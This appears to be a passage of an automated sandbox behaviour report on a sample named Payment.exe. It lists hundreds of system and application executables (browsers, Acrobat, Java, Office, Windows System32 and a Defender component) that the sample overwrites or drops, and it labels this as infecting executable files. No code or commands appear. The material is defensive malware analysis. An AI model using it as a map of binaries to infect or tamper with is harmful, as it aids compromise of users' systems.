Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\vds.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\snmptrap.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\Spectrum.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\Locator.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\SysWOW64\perfhost.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\VSSVC.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\wbengine.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\SearchIndexer.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\TieringEngineService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\AgentService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\SgrmBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\sppsvc.exe
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\SensorDataService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\msdtc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior

Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\vds.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\snmptrap.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\Spectrum.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\TieringEngineService.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\sppsvc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\wbengine.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to dropped file
